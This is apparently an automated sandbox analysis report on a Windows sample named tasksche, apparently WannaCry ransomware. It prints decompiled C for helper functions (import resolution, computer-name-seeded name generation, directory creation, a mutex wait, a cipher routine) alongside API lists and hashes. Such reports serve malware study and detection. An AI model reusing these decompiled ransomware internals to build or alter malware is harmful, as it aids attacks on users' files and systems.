                                                                                • Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                                                • Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
                                                                                • Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
                                                                                • Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E004027DF(signed int* _a4) {
                                                                                				intOrPtr _v8;
                                                                                				signed int _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr* _t50;
                                                                                				intOrPtr _t53;
                                                                                				intOrPtr _t55;
                                                                                				void* _t58;
                                                                                				void _t60;
                                                                                				signed int _t63;
                                                                                				signed int _t67;
                                                                                				intOrPtr _t68;
                                                                                				void* _t73;
                                                                                				signed int _t75;
                                                                                				intOrPtr _t87;
                                                                                				intOrPtr* _t88;
                                                                                				intOrPtr* _t90;
                                                                                				void* _t91;
                                                                                
                                                                                				_t90 = _a4;
                                                                                				_t2 = _t90 + 4; // 0x4be8563c
                                                                                				_t87 =  *_t2;
                                                                                				_t50 =  *_t90 + 0x80;
                                                                                				_t75 = 1;
                                                                                				_v16 = _t87;
                                                                                				_v12 = _t75;
                                                                                				if( *((intOrPtr*)(_t50 + 4)) != 0) {
                                                                                					_t73 =  *_t50 + _t87;
                                                                                					if(IsBadReadPtr(_t73, 0x14) != 0) {
                                                                                						L25:
                                                                                						return _v12;
                                                                                					}
                                                                                					while(1) {
                                                                                						_t53 =  *((intOrPtr*)(_t73 + 0xc));
                                                                                						if(_t53 == 0) {
                                                                                							goto L25;
                                                                                						}
                                                                                						_t8 = _t90 + 0x30; // 0xc085d0ff
                                                                                						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
                                                                                						_v8 = _t55;
                                                                                						if(_t55 == 0) {
                                                                                							SetLastError(0x7e);
                                                                                							L23:
                                                                                							_v12 = _v12 & 0x00000000;
                                                                                							goto L25;
                                                                                						}
                                                                                						_t11 = _t90 + 0xc; // 0x317459c0
                                                                                						_t14 = _t90 + 8; // 0x85000001
                                                                                						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
                                                                                						if(_t58 == 0) {
                                                                                							_t40 = _t90 + 0x30; // 0xc085d0ff
                                                                                							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
                                                                                							SetLastError(0xe);
                                                                                							goto L23;
                                                                                						}
                                                                                						_t15 = _t90 + 0xc; // 0x317459c0
                                                                                						 *(_t90 + 8) = _t58;
                                                                                						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
                                                                                						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
                                                                                						_t60 =  *_t73;
                                                                                						if(_t60 == 0) {
                                                                                							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
                                                                                							_a4 = _t88;
                                                                                						} else {
                                                                                							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
                                                                                							_a4 = _t60 + _t87;
                                                                                						}
                                                                                						while(1) {
                                                                                							_t63 =  *_a4;
                                                                                							if(_t63 == 0) {
                                                                                								break;
                                                                                							}
                                                                                							if((_t63 & 0x80000000) == 0) {
                                                                                								_t32 = _t90 + 0x30; // 0xc085d0ff
                                                                                								_push( *_t32);
                                                                                								_t67 = _t63 + _v16 + 2;
                                                                                							} else {
                                                                                								_t30 = _t90 + 0x30; // 0xc085d0ff
                                                                                								_push( *_t30);
                                                                                								_t67 = _t63 & 0x0000ffff;
                                                                                							}
                                                                                							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
                                                                                							_t91 = _t91 + 0xc;
                                                                                							 *_t88 = _t68;
                                                                                							if(_t68 == 0) {
                                                                                								_v12 = _v12 & 0x00000000;
                                                                                								break;
                                                                                							} else {
                                                                                								_a4 =  &(_a4[1]);
                                                                                								_t88 = _t88 + 4;
                                                                                								continue;
                                                                                							}
                                                                                						}
                                                                                						if(_v12 == 0) {
                                                                                							_t45 = _t90 + 0x30; // 0xc085d0ff
                                                                                							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
                                                                                							SetLastError(0x7f);
                                                                                							goto L25;
                                                                                						}
                                                                                						_t73 = _t73 + 0x14;
                                                                                						if(IsBadReadPtr(_t73, 0x14) == 0) {
                                                                                							_t87 = _v16;
                                                                                							continue;
                                                                                						}
                                                                                						goto L25;
                                                                                					}
                                                                                					goto L25;
                                                                                				}
                                                                                				return _t75;
                                                                                			}

                                                                                APIs
                                                                                • IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
                                                                                • realloc.MSVCRT(85000001,317459C0), ref: 00402854
                                                                                • IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Read$realloc
                                                                                • String ID: ?!@
                                                                                • API String ID: 1241503663-708128716
                                                                                • Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                                                • Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
                                                                                • Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
                                                                                • Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E00401225(intOrPtr _a4) {
                                                                                				signed int _v8;
                                                                                				long _v12;
                                                                                				void _v410;
                                                                                				long _v412;
                                                                                				long _t34;
                                                                                				signed int _t42;
                                                                                				intOrPtr _t44;
                                                                                				signed int _t45;
                                                                                				signed int _t48;
                                                                                				int _t54;
                                                                                				signed int _t56;
                                                                                				signed int _t60;
                                                                                				signed int _t61;
                                                                                				signed int _t62;
                                                                                				void* _t71;
                                                                                				signed short* _t72;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                
                                                                                				_t34 =  *0x40f874; // 0x0
                                                                                				_v412 = _t34;
                                                                                				_t56 = 0x63;
                                                                                				_v12 = 0x18f;
                                                                                				memset( &_v410, 0, _t56 << 2);
                                                                                				asm("stosw");
                                                                                				GetComputerNameW( &_v412,  &_v12);
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				_t54 = 1;
                                                                                				if(wcslen( &_v412) > 0) {
                                                                                					_t72 =  &_v412;
                                                                                					do {
                                                                                						_t54 = _t54 * ( *_t72 & 0x0000ffff);
                                                                                						_v8 = _v8 + 1;
                                                                                						_t72 =  &(_t72[1]);
                                                                                					} while (_v8 < wcslen( &_v412));
                                                                                				}
                                                                                				srand(_t54);
                                                                                				_t42 = rand();
                                                                                				_t71 = 0;
                                                                                				asm("cdq");
                                                                                				_t60 = 8;
                                                                                				_t76 = _t42 % _t60 + _t60;
                                                                                				if(_t76 > 0) {
                                                                                					do {
                                                                                						_t48 = rand();
                                                                                						asm("cdq");
                                                                                						_t62 = 0x1a;
                                                                                						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
                                                                                						_t71 = _t71 + 1;
                                                                                					} while (_t71 < _t76);
                                                                                				}
                                                                                				_t77 = _t76 + 3;
                                                                                				while(_t71 < _t77) {
                                                                                					_t45 = rand();
                                                                                					asm("cdq");
                                                                                					_t61 = 0xa;
                                                                                					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
                                                                                					_t71 = _t71 + 1;
                                                                                				}
                                                                                				_t44 = _a4;
                                                                                				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
                                                                                				return _t44;
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: rand$wcslen$ComputerNamesrand
                                                                                • String ID:
                                                                                • API String ID: 3058258771-0
                                                                                • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                                                • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                                                                                • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                                                • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00407070(char* _a4, char* _a8) {
                                                                                				char _v264;
                                                                                				void _v524;
                                                                                				long _t16;
                                                                                				char* _t30;
                                                                                				char* _t31;
                                                                                				char* _t36;
                                                                                				char* _t38;
                                                                                				int _t40;
                                                                                				void* _t41;
                                                                                
                                                                                				_t30 = _a4;
                                                                                				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
                                                                                					CreateDirectoryA(_t30, 0);
                                                                                				}
                                                                                				_t36 = _a8;
                                                                                				_t16 =  *_t36;
                                                                                				if(_t16 != 0) {
                                                                                					_t38 = _t36;
                                                                                					_t31 = _t36;
                                                                                					do {
                                                                                						if(_t16 == 0x2f || _t16 == 0x5c) {
                                                                                							_t38 = _t31;
                                                                                						}
                                                                                						_t16 = _t31[1];
                                                                                						_t31 =  &(_t31[1]);
                                                                                					} while (_t16 != 0);
                                                                                					if(_t38 != _t36) {
                                                                                						_t40 = _t38 - _t36;
                                                                                						memcpy( &_v524, _t36, _t40);
                                                                                						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
                                                                                						E00407070(_t30,  &_v524);
                                                                                					}
                                                                                					_v264 = _v264 & 0x00000000;
                                                                                					if(_t30 != 0) {
                                                                                						strcpy( &_v264, _t30);
                                                                                					}
                                                                                					strcat( &_v264, _t36);
                                                                                					_t16 = GetFileAttributesA( &_v264);
                                                                                					if(_t16 == 0xffffffff) {
                                                                                						return CreateDirectoryA( &_v264, 0);
                                                                                					}
                                                                                				}
                                                                                				return _t16;
                                                                                			}

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                                                                                • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                                                                                • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                                                                                • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                                                                                • String ID:
                                                                                • API String ID: 2935503933-0
                                                                                • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                                                • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                                                                                • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                                                • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                 C-Code - Quality: 100%
                                                                                 			E00401EFF(intOrPtr _a4) {
                                                                                 				char _v104;
                                                                                 				void* _t9;
                                                                                 				void* _t11;
                                                                                 				void* _t12;
                                                                                 
                                                                                 				// Builds the mutex name "Global\MsWinZonesCacheCounterMutexA0" ("%s%d" with the counter 0).
                                                                                 				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
                                                                                 				_t12 = 0;
                                                                                 				// _a4 is the maximum number of one-second polling attempts; 0 or less means no wait at all.
                                                                                 				if(_a4 <= 0) {
                                                                                 					L3:
                                                                                 					return 0;
                                                                                 				} else {
                                                                                 					goto L1;
                                                                                 				}
                                                                                 				while(1) {
                                                                                 					L1:
                                                                                 					// SYNCHRONIZE (0x100000) access; succeeds only once the mutex already exists.
                                                                                 					_t9 = OpenMutexA(0x100000, 1,  &_v104);
                                                                                 					if(_t9 != 0) {
                                                                                 						break;
                                                                                 					}
                                                                                 					// Sleep 1000 ms between attempts (0x3e8).
                                                                                 					Sleep(0x3e8);
                                                                                 					_t12 = _t12 + 1;
                                                                                 					if(_t12 < _a4) {
                                                                                 						continue;
                                                                                 					}
                                                                                 					goto L3;
                                                                                 				}
                                                                                 				// Mutex found: release the handle and report success (1); timeout returns 0.
                                                                                 				CloseHandle(_t9);
                                                                                 				_t11 = 1;
                                                                                 				return _t11;
                                                                                 			}

                                                                                APIs
                                                                                • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                                                                                • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                                                                                • Sleep.KERNEL32(000003E8), ref: 00401F40
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401F52
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleMutexOpenSleepsprintf
                                                                                • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                                                                                • API String ID: 2780352083-2959021817
                                                                                • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                                                • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                                                                                • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                                                • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                				void* _v12;
                                                                                				char _v16;
                                                                                				intOrPtr _v32;
                                                                                				intOrPtr _v36;
                                                                                				intOrPtr _v48;
                                                                                				signed int _t121;
                                                                                				int _t124;
                                                                                				intOrPtr* _t126;
                                                                                				intOrPtr _t127;
                                                                                				int _t131;
                                                                                				intOrPtr* _t133;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t137;
                                                                                				signed int _t139;
                                                                                				signed int _t140;
                                                                                				signed int _t143;
                                                                                				signed int _t150;
                                                                                				intOrPtr _t160;
                                                                                				int _t161;
                                                                                				int _t163;
                                                                                				signed int _t164;
                                                                                				signed int _t165;
                                                                                				intOrPtr _t168;
                                                                                				void* _t169;
                                                                                				signed int _t170;
                                                                                				signed int _t172;
                                                                                				signed int _t175;
                                                                                				signed int _t178;
                                                                                				intOrPtr _t194;
                                                                                				void* _t195;
                                                                                				void* _t196;
                                                                                				void* _t197;
                                                                                				intOrPtr _t198;
                                                                                				void* _t201;
                                                                                
                                                                                				_t197 = __ecx;
                                                                                				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
                                                                                					_push(0x40d570);
                                                                                					_push( &_v16);
                                                                                					L0040776E();
                                                                                				}
                                                                                				_t121 = _a12;
                                                                                				if(_t121 == 0) {
                                                                                					L15:
                                                                                					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
                                                                                					_push(0x40d570);
                                                                                					_push( &_v16);
                                                                                					L0040776E();
                                                                                					_push( &_v16);
                                                                                					_push(0);
                                                                                					_push(_t197);
                                                                                					_t198 = _v36;
                                                                                					_t194 = _v32;
                                                                                					_t168 =  *((intOrPtr*)(_t198 + 0x30));
                                                                                					_t160 =  *((intOrPtr*)(_t198 + 0x34));
                                                                                					_t71 = _t194 + 0xc; // 0x40d568
                                                                                					_v48 =  *_t71;
                                                                                					_v32 = _t168;
                                                                                					if(_t168 > _t160) {
                                                                                						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
                                                                                					}
                                                                                					_t75 = _t194 + 0x10; // 0x19930520
                                                                                					_t124 =  *_t75;
                                                                                					_t161 = _t160 - _t168;
                                                                                					if(_t161 > _t124) {
                                                                                						_t161 = _t124;
                                                                                					}
                                                                                					if(_t161 != 0 && _a8 == 0xfffffffb) {
                                                                                						_a8 = _a8 & 0x00000000;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
                                                                                					 *(_t194 + 0x10) = _t124 - _t161;
                                                                                					_t126 =  *((intOrPtr*)(_t198 + 0x38));
                                                                                					if(_t126 != 0) {
                                                                                						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
                                                                                						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
                                                                                						_t201 = _t201 + 0xc;
                                                                                						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
                                                                                					}
                                                                                					if(_t161 != 0) {
                                                                                						memcpy(_v12, _a4, _t161);
                                                                                						_v12 = _v12 + _t161;
                                                                                						_t201 = _t201 + 0xc;
                                                                                						_a4 = _a4 + _t161;
                                                                                					}
                                                                                					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
                                                                                					if(_a4 == _t127) {
                                                                                						_t169 =  *((intOrPtr*)(_t198 + 0x28));
                                                                                						_a4 = _t169;
                                                                                						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
                                                                                							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
                                                                                						}
                                                                                						_t99 = _t194 + 0x10; // 0x19930520
                                                                                						_t131 =  *_t99;
                                                                                						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
                                                                                						if(_t163 > _t131) {
                                                                                							_t163 = _t131;
                                                                                						}
                                                                                						if(_t163 != 0 && _a8 == 0xfffffffb) {
                                                                                							_a8 = _a8 & 0x00000000;
                                                                                						}
                                                                                						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
                                                                                						 *(_t194 + 0x10) = _t131 - _t163;
                                                                                						_t133 =  *((intOrPtr*)(_t198 + 0x38));
                                                                                						if(_t133 != 0) {
                                                                                							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
                                                                                							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
                                                                                							_t201 = _t201 + 0xc;
                                                                                							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
                                                                                						}
                                                                                						if(_t163 != 0) {
                                                                                							memcpy(_v12, _a4, _t163);
                                                                                							_v12 = _v12 + _t163;
                                                                                							_a4 = _a4 + _t163;
                                                                                						}
                                                                                					}
                                                                                					 *(_t194 + 0xc) = _v12;
                                                                                					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
                                                                                					return _a8;
                                                                                				} else {
                                                                                					_t170 =  *(_t197 + 0x3cc);
                                                                                					if(_t121 % _t170 != 0) {
                                                                                						goto L15;
                                                                                					} else {
                                                                                						if(_a16 != 1) {
                                                                                							_t195 = _a4;
                                                                                							_t139 = _a12;
                                                                                							_a16 = 0;
                                                                                							_t164 = _a8;
                                                                                							if(_a16 != 2) {
                                                                                								_t140 = _t139 / _t170;
                                                                                								if(_t140 > 0) {
                                                                                									do {
                                                                                										E00403797(_t197, _t195, _t164);
                                                                                										_t172 =  *(_t197 + 0x3cc);
                                                                                										_t195 = _t195 + _t172;
                                                                                										_t143 = _a12 / _t172;
                                                                                										_t164 = _t164 + _t172;
                                                                                										_a16 = _a16 + 1;
                                                                                									} while (_a16 < _t143);
                                                                                									return _t143;
                                                                                								}
                                                                                							} else {
                                                                                								_t140 = _t139 / _t170;
                                                                                								if(_t140 > 0) {
                                                                                									do {
                                                                                										E0040350F(_t197, _t197 + 0x3f0, _t164);
                                                                                										E00403A28(_t197, _t164, _t195);
                                                                                										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
                                                                                										_t175 =  *(_t197 + 0x3cc);
                                                                                										_t201 = _t201 + 0xc;
                                                                                										_t150 = _a12 / _t175;
                                                                                										_t195 = _t195 + _t175;
                                                                                										_t164 = _t164 + _t175;
                                                                                										_a16 = _a16 + 1;
                                                                                									} while (_a16 < _t150);
                                                                                									return _t150;
                                                                                								}
                                                                                							}
                                                                                						} else {
                                                                                							_t196 = _a4;
                                                                                							_t140 = _a12 / _t170;
                                                                                							_a16 = 0;
                                                                                							_t165 = _a8;
                                                                                							if(_t140 > 0) {
                                                                                								do {
                                                                                									E00403797(_t197, _t196, _t165);
                                                                                									E00403A28(_t197, _t165, _t197 + 0x3f0);
                                                                                									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
                                                                                									_t178 =  *(_t197 + 0x3cc);
                                                                                									_t201 = _t201 + 0xc;
                                                                                									_t140 = _a12 / _t178;
                                                                                									_t196 = _t196 + _t178;
                                                                                									_t165 = _t165 + _t178;
                                                                                									_a16 = _a16 + 1;
                                                                                								} while (_a16 < _t140);
                                                                                							}
                                                                                						}
                                                                                						return _t140;
                                                                                					}
                                                                                				}
                                                                                			}
                                                                                0x00403a7f
                                                                                0x00403a87
                                                                                0x00403a91
                                                                                0x00403a9a
                                                                                0x00403a9f
                                                                                0x00403aa0
                                                                                0x00403aa0
                                                                                0x00403aa5
                                                                                0x00403aaa
                                                                                0x00403bba
                                                                                0x00403bc2
                                                                                0x00403bcb
                                                                                0x00403bd0
                                                                                0x00403bd1
                                                                                0x00403bd9
                                                                                0x00403bda
                                                                                0x00403bdb
                                                                                0x00403bdc
                                                                                0x00403be0
                                                                                0x00403be3
                                                                                0x00403be6
                                                                                0x00403be9
                                                                                0x00403bee
                                                                                0x00403bf1
                                                                                0x00403bf4
                                                                                0x00403bf6
                                                                                0x00403bf6
                                                                                0x00403bf9
                                                                                0x00403bf9
                                                                                0x00403bfc
                                                                                0x00403c00
                                                                                0x00403c02
                                                                                0x00403c02
                                                                                0x00403c06
                                                                                0x00403c0e
                                                                                0x00403c0e
                                                                                0x00403c12
                                                                                0x00403c17
                                                                                0x00403c1a
                                                                                0x00403c1f
                                                                                0x00403c26
                                                                                0x00403c28
                                                                                0x00403c2b
                                                                                0x00403c2e
                                                                                0x00403c2e
                                                                                0x00403c33
                                                                                0x00403c3c
                                                                                0x00403c41
                                                                                0x00403c44
                                                                                0x00403c47
                                                                                0x00403c47
                                                                                0x00403c4a
                                                                                0x00403c50
                                                                                0x00403c52
                                                                                0x00403c58
                                                                                0x00403c5b
                                                                                0x00403c5d
                                                                                0x00403c5d
                                                                                0x00403c63
                                                                                0x00403c63
                                                                                0x00403c66
                                                                                0x00403c6a
                                                                                0x00403c6c
                                                                                0x00403c6c
                                                                                0x00403c70
                                                                                0x00403c78
                                                                                0x00403c78
                                                                                0x00403c7c
                                                                                0x00403c81
                                                                                0x00403c84
                                                                                0x00403c89
                                                                                0x00403c90
                                                                                0x00403c92
                                                                                0x00403c95
                                                                                0x00403c98
                                                                                0x00403c98
                                                                                0x00403c9d
                                                                                0x00403ca6
                                                                                0x00403cab
                                                                                0x00403cb1
                                                                                0x00403cb1
                                                                                0x00403c9d
                                                                                0x00403cb7
                                                                                0x00403cbd
                                                                                0x00403cc7
                                                                                0x00403ab0
                                                                                0x00403ab0
                                                                                0x00403abc
                                                                                0x00000000
                                                                                0x00403ac2
                                                                                0x00403ac6
                                                                                0x00403b2c
                                                                                0x00403b2f
                                                                                0x00403b32
                                                                                0x00403b35
                                                                                0x00403b38
                                                                                0x00403b8d
                                                                                0x00403b91
                                                                                0x00403b93
                                                                                0x00403b97
                                                                                0x00403b9c
                                                                                0x00403ba7
                                                                                0x00403ba9
                                                                                0x00403bab
                                                                                0x00403bad
                                                                                0x00403bb0
                                                                                0x00000000
                                                                                0x00403b93
                                                                                0x00403b3a
                                                                                0x00403b3c
                                                                                0x00403b40
                                                                                0x00403b42
                                                                                0x00403b4c
                                                                                0x00403b55
                                                                                0x00403b68
                                                                                0x00403b6d
                                                                                0x00403b78
                                                                                0x00403b7b
                                                                                0x00403b7d
                                                                                0x00403b7f
                                                                                0x00403b81
                                                                                0x00403b84
                                                                                0x00000000
                                                                                0x00403b42
                                                                                0x00403b40
                                                                                0x00403ac8
                                                                                0x00403acb
                                                                                0x00403ace
                                                                                0x00403ad0
                                                                                0x00403ad3
                                                                                0x00403ad8
                                                                                0x00403ada
                                                                                0x00403ade
                                                                                0x00403aed
                                                                                0x00403b00
                                                                                0x00403b05
                                                                                0x00403b10
                                                                                0x00403b13
                                                                                0x00403b15
                                                                                0x00403b17
                                                                                0x00403b19
                                                                                0x00403b1c
                                                                                0x00403ada
                                                                                0x00403ad8
                                                                                0x00403b25
                                                                                0x00403b25
                                                                                0x00403abc

                                                                                APIs
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2382887404-0
                                                                                • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                                                • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                                                                                • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                                                • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

